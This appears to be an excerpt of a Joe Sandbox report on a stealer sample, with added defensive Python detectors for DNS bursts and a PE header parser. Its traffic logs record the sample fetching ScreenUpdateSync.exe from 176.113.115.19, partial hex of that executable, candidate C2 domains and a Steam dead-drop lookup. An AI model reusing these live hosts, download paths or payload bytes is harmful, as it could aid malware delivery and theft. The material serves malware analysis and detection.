Jan 12, 2025 17:52:05.764034986 CET  53           52066      1.1.1.1          192.168.2.5
Jan 12, 2025 17:52:05.766500950 CET  57954        53         192.168.2.5      1.1.1.1
Jan 12, 2025 17:52:05.775381088 CET  53           57954      1.1.1.1          192.168.2.5
Jan 12, 2025 17:52:05.777220964 CET  55763        53         192.168.2.5      1.1.1.1
Jan 12, 2025 17:52:05.784648895 CET  53           55763      1.1.1.1          192.168.2.5
Jan 12, 2025 17:52:05.790389061 CET  56571        53         192.168.2.5      1.1.1.1
Jan 12, 2025 17:52:05.797118902 CET  53           56571      1.1.1.1          192.168.2.5
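The UDP table above shows the sample firing ten DNS lookups at 1.1.1.1 within about 110 ms of each other (17:52:05.685 to 17:52:05.790), and the DNS query table that follows names the domains it resolved, a pattern consistent with a stealer walking its configured list of candidate C2 hosts. The detector below is an added example written for this section; it is not part of the Joe Sandbox report or of the sample's code. It runs a sliding-window check over a few DNS log lines constructed from the values in the report's DNS query table (the one-line-per-query text format, the 1 second window and the three-domain threshold are assumptions chosen for illustration) and flags a source IP that resolves several distinct registrable domains in a short window, reporting the domains and TLDs involved.

```python
"""Sliding-window detector for bursts of DNS resolutions from one host.

Added example, not part of the Joe Sandbox report. The sample log lines are
constructed from the timestamps, IPs, transaction IDs and names in the
report's DNS query table; the line format, window length and threshold are
assumptions made for illustration.
"""
from collections import deque
from datetime import datetime

# Constructed sample input, one query per line:
# "<Mon> <dd>, <yyyy> <HH:MM:SS.ns> <src IP> <dst IP> <txid> <name> <qtype>"
SAMPLE_DNS_LOG = """\
Jan 12, 2025 17:52:01.004312038 192.168.2.5 1.1.1.1 0x9c1c post-to-me.com A
Jan 12, 2025 17:52:05.685065031 192.168.2.5 1.1.1.1 0x5fbf skidjazzyric.click A
Jan 12, 2025 17:52:05.700683117 192.168.2.5 1.1.1.1 0x5e9a soundtappysk.shop A
Jan 12, 2025 17:52:05.714240074 192.168.2.5 1.1.1.1 0xe161 femalsabler.shop A
Jan 12, 2025 17:52:05.725641966 192.168.2.5 1.1.1.1 0x820a apporholis.shop A
"""


def parse_line(line):
    """Split one constructed log line into a dict with a datetime timestamp."""
    parts = line.split()
    # The timestamp spans four tokens: "Jan", "12,", "2025", "17:52:05.685065031".
    date_text = " ".join(parts[:3])
    hms, frac = parts[3].split(".")
    # datetime keeps microseconds only, so the nanosecond tail is truncated.
    ts = datetime.strptime(f"{date_text} {hms}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
    src, dst, txid, name, qtype = parts[4:9]
    return {"ts": ts, "src": src, "dst": dst, "txid": txid,
            "name": name.rstrip(".").lower(), "qtype": qtype}


def registrable_domain(name):
    """Naive eTLD+1 (last two labels). Adequate for the single-label TLDs seen
    here; a public-suffix list would be needed for names such as example.co.uk."""
    labels = name.split(".")
    return ".".join(labels[-2:])


def detect_bursts(log_text, window_seconds=1.0, min_domains=3):
    """Return one alert per run of queries in which a single source IP resolves
    at least min_domains distinct registrable domains inside a sliding window
    of window_seconds. Each alert carries the domains and TLDs involved."""
    events = [parse_line(ln) for ln in log_text.splitlines() if ln.strip()]
    events.sort(key=lambda e: e["ts"])
    by_src = {}
    for e in events:
        by_src.setdefault(e["src"], []).append(e)

    alerts = []
    for src, evs in by_src.items():
        window = deque()
        current = None
        for e in evs:
            window.append(e)
            # Drop queries that have fallen out of the window.
            while (e["ts"] - window[0]["ts"]).total_seconds() > window_seconds:
                window.popleft()
            domains = {registrable_domain(x["name"]) for x in window}
            if len(domains) >= min_domains:
                if current is None:
                    current = {"src": src, "start": window[0]["ts"], "end": e["ts"],
                               "domains": set(), "tlds": set()}
                    alerts.append(current)
                current["end"] = e["ts"]
                current["domains"] |= domains
                current["tlds"] |= {d.rsplit(".", 1)[-1] for d in domains}
            else:
                # The burst ended; a later one gets its own alert.
                current = None
    return alerts


if __name__ == "__main__":
    for a in detect_bursts(SAMPLE_DNS_LOG):
        span = (a["end"] - a["start"]).total_seconds()
        print(f"{a['src']} resolved {len(a['domains'])} domains in {span:.3f}s: "
              f"{sorted(a['domains'])} (TLDs: {sorted(a['tlds'])})")
```

With the default 1 second window the lookup of post-to-me.com at 17:52:01 stays outside the alert and only the four .shop/.click names resolved in the 40 ms burst are reported; widening the window to 5 seconds pulls the earlier lookup into the same alert. In production the same logic would read from DNS server or EDR telemetry keyed by process rather than only by source IP, and the threshold should be tuned against the normal fan-out of browsers and update agents, which also resolve many names quickly but rarely across freshly registered .shop and .click domains.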
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 12, 2025 17:52:01.004312038 CET | 192.168.2.5 | 1.1.1.1 | 0x9c1c | Standard query (0) | post-to-me.com | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.685065031 CET | 192.168.2.5 | 1.1.1.1 | 0x5fbf | Standard query (0) | skidjazzyric.click | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.700683117 CET | 192.168.2.5 | 1.1.1.1 | 0x5e9a | Standard query (0) | soundtappysk.shop | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.714240074 CET | 192.168.2.5 | 1.1.1.1 | 0xe161 | Standard query (0) | femalsabler.shop | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.725641966 CET | 192.168.2.5 | 1.1.1.1 | 0x820a | Standard query (0) | apporholis.shop | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.736407995 CET | 192.168.2.5 | 1.1.1.1 | 0xc6fb | Standard query (0) | crowdwarek.shop | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.746938944 CET | 192.168.2.5 | 1.1.1.1 | 0xbab5 | Standard query (0) | versersleep.shop | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.755306959 CET | 192.168.2.5 | 1.1.1.1 | 0xc94e | Standard query (0) | chipdonkeruz.shop | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.766500950 CET | 192.168.2.5 | 1.1.1.1 | 0xfbcd | Standard query (0) | handscreamny.shop | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.777220964 CET | 192.168.2.5 | 1.1.1.1 | 0x32e8 | Standard query (0) | robinsharez.shop | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.790389061 CET | 192.168.2.5 | 1.1.1.1 | 0x2284 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 12, 2025 17:52:01.018717051 CET | 1.1.1.1 | 192.168.2.5 | 0x9c1c | No error (0) | post-to-me.com | | 172.67.179.207 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:01.018717051 CET | 1.1.1.1 | 192.168.2.5 | 0x9c1c | No error (0) | post-to-me.com | | 104.21.56.70 | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.696404934 CET | 1.1.1.1 | 192.168.2.5 | 0x5fbf | Name error (3) | skidjazzyric.click | none | none | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.710176945 CET | 1.1.1.1 | 192.168.2.5 | 0x5e9a | Name error (3) | soundtappysk.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.723428965 CET | 1.1.1.1 | 192.168.2.5 | 0xe161 | Name error (3) | femalsabler.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.734882116 CET | 1.1.1.1 | 192.168.2.5 | 0x820a | Name error (3) | apporholis.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.745599031 CET | 1.1.1.1 | 192.168.2.5 | 0xc6fb | Name error (3) | crowdwarek.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.753963947 CET | 1.1.1.1 | 192.168.2.5 | 0xbab5 | Name error (3) | versersleep.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.764034986 CET | 1.1.1.1 | 192.168.2.5 | 0xc94e | Name error (3) | chipdonkeruz.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.775381088 CET | 1.1.1.1 | 192.168.2.5 | 0xfbcd | Name error (3) | handscreamny.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.784648895 CET | 1.1.1.1 | 192.168.2.5 | 0x32e8 | Name error (3) | robinsharez.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 12, 2025 17:52:05.797118902 CET | 1.1.1.1 | 192.168.2.5 | 0x2284 | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
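The answer table above shows a pattern worth alerting on rather than just recording: within roughly 100 ms the analysis host asks for nine domains on cheap TLDs (.click, .shop), every one comes back NXDOMAIN, and the next lookup (steamcommunity.com) succeeds and is then contacted by the dropped EB86.tmp.exe. The following detector is an added example, not part of the Joe Sandbox report or of any vendor signature. SAMPLE_DNS_LOG is constructed from the answer rows above (timestamps as printed, trimmed to microseconds); the tab-separated four-field layout, the 10-second window and the five-failure threshold are assumptions for the demonstration and would be tuned against real resolver or Zeek dns.log data.

```python
"""Flag a burst of NXDOMAIN answers for distinct names from one client and
report which names did resolve for that client inside the same window.

Added example, not from the sandbox report. SAMPLE_DNS_LOG is constructed
from the report's DNS answer table; window and threshold are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: "timestamp<TAB>client<TAB>rcode<TAB>name", one answer per line.
SAMPLE_DNS_LOG = """\
2025-01-12 17:52:01.018717\t192.168.2.5\tNOERROR\tpost-to-me.com
2025-01-12 17:52:05.696405\t192.168.2.5\tNXDOMAIN\tskidjazzyric.click
2025-01-12 17:52:05.710177\t192.168.2.5\tNXDOMAIN\tsoundtappysk.shop
2025-01-12 17:52:05.723429\t192.168.2.5\tNXDOMAIN\tfemalsabler.shop
2025-01-12 17:52:05.734882\t192.168.2.5\tNXDOMAIN\tapporholis.shop
2025-01-12 17:52:05.745599\t192.168.2.5\tNXDOMAIN\tcrowdwarek.shop
2025-01-12 17:52:05.753964\t192.168.2.5\tNXDOMAIN\tversersleep.shop
2025-01-12 17:52:05.764035\t192.168.2.5\tNXDOMAIN\tchipdonkeruz.shop
2025-01-12 17:52:05.775381\t192.168.2.5\tNXDOMAIN\thandscreamny.shop
2025-01-12 17:52:05.784649\t192.168.2.5\tNXDOMAIN\trobinsharez.shop
2025-01-12 17:52:05.797119\t192.168.2.5\tNOERROR\tsteamcommunity.com
"""


def parse_log(text):
    """Return (timestamp, client, rcode, name) tuples sorted oldest first."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, rcode, name = line.split("\t")
        rows.append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f"), client, rcode, name))
    rows.sort()
    return rows


def find_nxdomain_bursts(rows, window=timedelta(seconds=10), min_failures=5):
    """One alert per client whose NXDOMAIN answers for distinct names inside
    `window` reach `min_failures`. The alert also lists the names that DID
    resolve for that client in the same window, counted from the first
    failure: that is where the host the sample goes on to talk to shows up.
    Thresholds are assumptions for this example."""
    by_client = defaultdict(list)
    for row in rows:
        by_client[row[1]].append(row)

    alerts = []
    for client, events in by_client.items():
        failures = [e for e in events if e[2] == "NXDOMAIN"]
        i = 0
        while i < len(failures):
            start = failures[i][0]
            end = start + window
            in_window = [e for e in failures if start <= e[0] < end]
            names = sorted({e[3] for e in in_window})
            if len(names) >= min_failures:
                resolved = [e[3] for e in events
                            if e[2] == "NOERROR" and start <= e[0] < end]
                alerts.append({
                    "client": client,
                    "first_failure": start,
                    "failed": names,
                    "resolved_after": resolved,
                })
                i += len(in_window)  # one alert per burst, not per failure
            else:
                i += 1
    return alerts


if __name__ == "__main__":
    for alert in find_nxdomain_bursts(parse_log(SAMPLE_DNS_LOG)):
        print("%s: %d NXDOMAIN names from %s; resolved in window: %s" % (
            alert["client"], len(alert["failed"]),
            alert["first_failure"].isoformat(), alert["resolved_after"]))
```

Because the window is anchored at the first failure, post-to-me.com (answered four seconds earlier, by the downloader stage) is not attributed to the burst, while steamcommunity.com is; on production data the same split separates ordinary pre-infection traffic from the fallback sequence itself.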
• post-to-me.com
• steamcommunity.com
• 176.113.115.19
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 176.113.115.19 | 80 | 768 | C:\Users\user\Desktop\L7GNkeVm5e.exe
Timestamp | Bytes transferred | Direction | Data
Jan 12, 2025 17:52:02.059999943 CET | 85 | OUT | GET /ScreenUpdateSync.exe HTTP/1.1
User-Agent: ShareScreen
Host: 176.113.115.19
Jan 12, 2025 17:52:02.739356995 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Sun, 12 Jan 2025 16:52:02 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sun, 12 Jan 2025 16:45:01 GMT
ETag: "62a00-62b850c908464"
Accept-Ranges: bytes
Content-Length: 403968
Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ec be f9 b4 a8 df 97 e7 a8 df 97 e7 a8 df 97 e7 b6 8d 13 e7 89 df 97 e7 b6 8d 02 e7 bc df 97 e7 b6 8d 14 e7 c4 df 97 e7 8f 19 ec e7 ab df 97 e7 a8 df 96 e7 d9 df 97 e7 b6 8d 1d e7 a9 df 97 e7 b6 8d 03 e7 a9 df 97 e7 b6 8d 06 e7 a9 df 97 e7 52 69 63 68 a8 df 97 e7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 f9 fd 95 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 36 04 00 00 70 08 00 00 00 00 00 b7 14 00 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 0c 00 00 04 00 00 02 17 07 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$RichPELf6pP@i(iP.text46 `.rdataV"P$:@@.data|^@.nosuSHt@.muwavZ`@.roxahp@@.rsrcij@@
Jan 12, 2025 17:52:02.739381075 CET | 224 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 04 80 44 00 75 02 f3 c3 e9 b2 04 00 00 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 e8 29 06 00 00 8b
                                                                                                                                                                                                                                                Data Ascii: ;DuUQeVEPuu)u9EttM^USVuF3u@t9FW>+~,WPVYP;uFyFN _Ff^[]
Jan 12, 2025 17:52:02.739406109 CET | 1236 | IN | Data Raw: ff 55 8b ec 56 8b 75 08 85 f6 75 09 56 e8 35 00 00 00 59 eb 2f 56 e8 7c ff ff ff 59 85 c0 74 05 83 c8 ff eb 1f f7 46 0c 00 40 00 00 74 14 56 e8 93 0e 00 00 50 e8 bf 0e 00 00 59 f7 d8 59 1b c0 eb 02 33 c0 5e 5d c3 6a 14 68 d0 65 44 00 e8 ed 12 00
                                                                                                                                                                                                                                                Data Ascii: UVuuV5Y/V|YtF@tVPYY3^]jheD3}}jY}3u;5JJ98t^@tVPVYY3BUJHt/9UuPJYtE9}utP/YuE}F3uJ4V
Jan 12, 2025 17:52:02.739418030 CET | 1236 | IN | Data Raw: 00 00 59 6a 00 ff 15 9c 50 44 00 68 c8 51 44 00 ff 15 98 50 44 00 83 3d e0 94 44 00 00 75 08 6a 01 e8 1f 36 00 00 59 68 09 04 00 c0 ff 15 94 50 44 00 50 ff 15 90 50 44 00 c9 c3 8b ff 55 8b ec 8b 45 08 33 c9 3b 04 cd 10 80 44 00 74 13 41 83 f9 2d
                                                                                                                                                                                                                                                Data Ascii: YjPDhQDPD=Duj6YhPDPPDUE3;DtA-rHwjX]D]DjY;#]1uxD1u|DUVMQY0^]jh`fDM3;v.jX3;E@u
Jan 12, 2025 17:52:02.739428997 CET | 448 | IN | Data Raw: 33 c9 66 83 fe 0a 0f 94 c1 43 43 83 85 44 e5 ff ff 02 89 b5 40 e5 ff ff 89 8d 20 e5 ff ff 3c 01 74 04 3c 02 75 52 ff b5 40 e5 ff ff e8 bd 3c 00 00 59 66 3b 85 40 e5 ff ff 0f 85 68 03 00 00 83 85 38 e5 ff ff 02 83 bd 20 e5 ff ff 00 74 29 6a 0d 58
                                                                                                                                                                                                                                                Data Ascii: 3fCCD@ <t<uR@<Yf;@h8 t)jXP@<Yf;@;80E9D'8T4D83@4@<9M (<D+4
Jan 12, 2025 17:52:02.739440918 CET | 1236 | IN | Data Raw: 2b 8d 34 e5 ff ff 8d 85 48 e5 ff ff 3b 4d 10 73 46 8b 95 44 e5 ff ff 83 85 44 e5 ff ff 02 0f b7 12 41 41 66 83 fa 0a 75 16 83 85 30 e5 ff ff 02 6a 0d 5b 66 89 18 40 40 83 85 3c e5 ff ff 02 83 85 3c e5 ff ff 02 66 89 10 40 40 81 bd 3c e5 ff ff fe
                                                                                                                                                                                                                                                Data Ascii: +4H;MsFDDAAfu0j[f@@<<f@@<rH+j,PSHP4PDb,8;ZD+4;E?@9M|D<+4jH^;Ms<DDfu
Jan 12, 2025 17:52:02.739453077 CET | 1236 | IN | Data Raw: 7e 04 01 74 0d 57 ff d3 57 e8 fc 3c 00 00 83 26 00 59 83 c6 08 81 fe a0 82 44 00 7c dc be 80 81 44 00 5f 8b 06 85 c0 74 09 83 7e 04 01 75 03 50 ff d3 83 c6 08 81 fe a0 82 44 00 7c e6 5e 5b c3 8b ff 55 8b ec 8b 45 08 ff 34 c5 80 81 44 00 ff 15 c4
                                                                                                                                                                                                                                                Data Ascii: ~tWW<&YD|D_t~uPD|^[UE4DPD]jhfD3G}39DujMhYYu4D9tnj<Y;ue3QjYY]9u,hW;YYuW*<Y/]>
Jan 12, 2025 17:52:02.739463091 CET | 448 | IN | Data Raw: 49 3b 00 00 ba fe ff ff ff 39 53 0c 0f 84 52 ff ff ff 68 04 80 44 00 57 8b cb e8 61 3b 00 00 e9 1c ff ff ff 8b ff 55 8b ec 56 8b 75 08 56 e8 84 f9 ff ff 50 e8 8e 33 00 00 59 59 85 c0 74 7c e8 35 fc ff ff 83 c0 20 3b f0 75 04 33 c0 eb 0f e8 25 fc
                                                                                                                                                                                                                                                Data Ascii: I;9SRhDWa;UVuVP3YYt|5 ;u3%@;u`3@DFuNSW<D?u S>8YuFjFXFF?~>^^N3_@[3^]U}t'VuFtVff&fY^]
Jan 12, 2025 17:52:02.739474058 CET | 1236 | IN | Data Raw: 0c e8 b5 ff ff ff 83 3e ff 74 06 83 7d 0c 00 7f e7 5e 5d c3 8b ff 55 8b ec f6 47 0c 40 53 56 8b f0 8b d9 74 32 83 7f 08 00 75 2c 8b 45 08 01 06 eb 2b 8a 03 ff 4d 08 8b cf e8 7d ff ff ff 43 83 3e ff 75 13 e8 38 ee ff ff 83 38 2a 75 0f 8b cf b0 3f
                                                                                                                                                                                                                                                Data Ascii: >t}^]UG@SVt2u,E+M}C>u88*u?d}^[]UxD3ES]Vu3W}ulu53PPPPPMt
Jan 12, 2025 17:52:02.739485979 CET | 1116 | IN | Data Raw: ff ff 00 08 00 00 e9 89 00 00 00 f7 85 f0 fd ff ff 30 08 00 00 75 0a 81 8d f0 fd ff ff 00 08 00 00 8b 8d e8 fd ff ff 83 f9 ff 75 05 b9 ff ff ff 7f 83 c7 04 f7 85 f0 fd ff ff 10 08 00 00 89 bd dc fd ff ff 8b 7f fc 89 bd e4 fd ff ff 0f 84 b1 04 00
                                                                                                                                                                                                                                                Data Ascii: 0uu;u$DXHHty+'HHt0GPhPPCtG
Jan 12, 2025 17:52:02.744415998 CET | 1236 | IN | Data Raw: 85 e8 fd ff ff 8b c7 0b c3 75 06 21 85 d0 fd ff ff 8d 75 f3 8b 85 e8 fd ff ff ff 8d e8 fd ff ff 85 c0 7f 06 8b c7 0b c3 74 2d 8b 85 e0 fd ff ff 99 52 50 53 57 e8 6e 3f 00 00 83 c1 30 83 f9 39 89 9d a0 fd ff ff 8b f8 8b da 7e 06 03 8d b8 fd ff ff
                                                                                                                                                                                                                                                Data Ascii: u!ut-RPSWn?09~NE+Ftat90tV0@>If90t@@;u+(;u DI8t@;u+\@t2t
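The sandbox only prints the first few hundred bytes of the file that came back for GET /ScreenUpdateSync.exe, but that prefix already reaches into the PE optional header, which is enough to pull the fields an analyst pivots on (architecture, section count, link timestamp, linker version, entry point, ASLR/DEP flags) before the full sample is available. The following triage script is an added example, not part of the Joe Sandbox report or of the sample's tooling. RESPONSE_PREFIX_HEX is copied from the start of the 200 OK body's Data Raw column above (offsets 0x000 to 0x14f); because the report truncates the dump inside the optional header, section headers are out of reach and are deliberately not parsed. Standard library only.

```python
"""Parse DOS header -> PE signature -> COFF header -> PE32 optional header
from the captured prefix of a downloaded executable.

Added example, not from the sandbox report. RESPONSE_PREFIX_HEX is copied
from the report's "Data Raw" dump of the 200 OK body; nothing past the
captured prefix is assumed to exist.
"""
import struct
from datetime import datetime, timezone

# First 0x150 bytes of the response body, copied from the report, 16 per row.
RESPONSE_PREFIX_HEX = """
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00
b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00
0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68
69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20
6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
ec be f9 b4 a8 df 97 e7 a8 df 97 e7 a8 df 97 e7
b6 8d 13 e7 89 df 97 e7 b6 8d 02 e7 bc df 97 e7
b6 8d 14 e7 c4 df 97 e7 8f 19 ec e7 ab df 97 e7
a8 df 96 e7 d9 df 97 e7 b6 8d 1d e7 a9 df 97 e7
b6 8d 03 e7 a9 df 97 e7 b6 8d 06 e7 a9 df 97 e7
52 69 63 68 a8 df 97 e7 00 00 00 00 00 00 00 00
50 45 00 00 4c 01 07 00 f9 fd 95 66 00 00 00 00
00 00 00 00 e0 00 03 01 0b 01 09 00 00 36 04 00
00 70 08 00 00 00 00 00 b7 14 00 00 00 10 00 00
00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00
05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00
00 f0 0c 00 00 04 00 00 02 17 07 00 02 00 00 81
00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00
"""

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x010B
DLLCHAR_DYNAMIC_BASE = 0x0040   # image opts in to ASLR
DLLCHAR_NX_COMPAT = 0x0100      # image opts in to DEP


def hex_to_bytes(dump):
    """bytes.fromhex skips all ASCII whitespace, so the row layout is fine."""
    return bytes.fromhex(dump)


def triage_pe_prefix(data):
    """Return the header fields worth pivoting on, or raise ValueError if the
    prefix is not a PE32 image. Only reads up to DllCharacteristics, which is
    all the captured prefix guarantees."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ magic: not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew=0x%x" % e_lfanew)

    coff = e_lfanew + 4
    (machine, nsections, timestamp, _symtab, _nsyms,
     _opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, coff)

    opt = coff + 20
    magic, linker_major, linker_minor = struct.unpack_from("<HBB", data, opt)
    if magic != IMAGE_NT_OPTIONAL_HDR32_MAGIC:
        raise ValueError("only PE32 handled here, magic=0x%x" % magic)
    entry_point, _code, _data, image_base = struct.unpack_from("<IIII", data, opt + 16)
    size_of_image = struct.unpack_from("<I", data, opt + 56)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)

    return {
        "machine": machine,
        "is_x86": machine == IMAGE_FILE_MACHINE_I386,
        "sections": nsections,
        "timestamp": timestamp,
        "compile_time_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat(),
        "characteristics": characteristics,
        "linker_version": "%d.%d" % (linker_major, linker_minor),
        "entry_point": entry_point,
        "image_base": image_base,
        "size_of_image": size_of_image,
        "subsystem": subsystem,          # 2 = Windows GUI, 3 = console
        "aslr": bool(dll_chars & DLLCHAR_DYNAMIC_BASE),
        "nx_compat": bool(dll_chars & DLLCHAR_NX_COMPAT),
    }


if __name__ == "__main__":
    for key, value in triage_pe_prefix(hex_to_bytes(RESPONSE_PREFIX_HEX)).items():
        shown = hex(value) if isinstance(value, int) and not isinstance(value, bool) else value
        print("%-18s %s" % (key, shown))
```

On this capture the parse yields a 32-bit GUI executable with seven sections, linker version 9.0, a link timestamp of 2024-07-16 and no ASLR opt-in, which is consistent with the unusual section names visible in the Data Ascii rendering (.nosu, .muwav, .roxah) and the unpacking signatures listed in the report. A cheap consistency check on the transfer itself: Apache's ETag "62a00-62b850c908464" carries the file size in hex as its first field, and 0x62a00 is 403968, matching the Content-Length header.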


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 172.67.179.207 | 443 | 768 | C:\Users\user\Desktop\L7GNkeVm5e.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:52:01 UTC | 90 | OUT | GET /track_prt.php?sub=0&cc=DE HTTP/1.1
User-Agent: ShareScreen
Host: post-to-me.com
2025-01-12 16:52:01 UTC | 806 | IN | HTTP/1.1 200 OK
Date: Sun, 12 Jan 2025 16:52:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.4.16
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2BQcjqmklOiyaXbFCpH%2FcljOGRaQDQYcvE9byTChPCkl26YsKxLGKYFxQ4lnmkwCAVUcloTO4OWxJk%2Fkc%2BFsJNG3tD2hidUJse8KZVnvV1Bh3RZ6nEzwIwL%2FmdTCl2ce4A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 900ea79678241861-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1505&min_rtt=1501&rtt_var=571&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=728&delivery_rate=1903520&cwnd=188&unsent_bytes=0&cid=266263e74a1d6161&ts=407&x=0"
2025-01-12 16:52:01 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2025-01-12 16:52:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49706 | 104.102.49.254 | 443 | 412 | C:\Users\user\AppData\Local\Temp\EB86.tmp.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 16:52:06 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2025-01-12 16:52:06 UTC | 1905 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Date: Sun, 12 Jan 2025 16:52:06 GMT
                                                                                                                                                                                                                                                Content-Length: 25665
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: sessionid=cbc3a60c9f2906ff09a75258; Path=/; Secure; SameSite=None
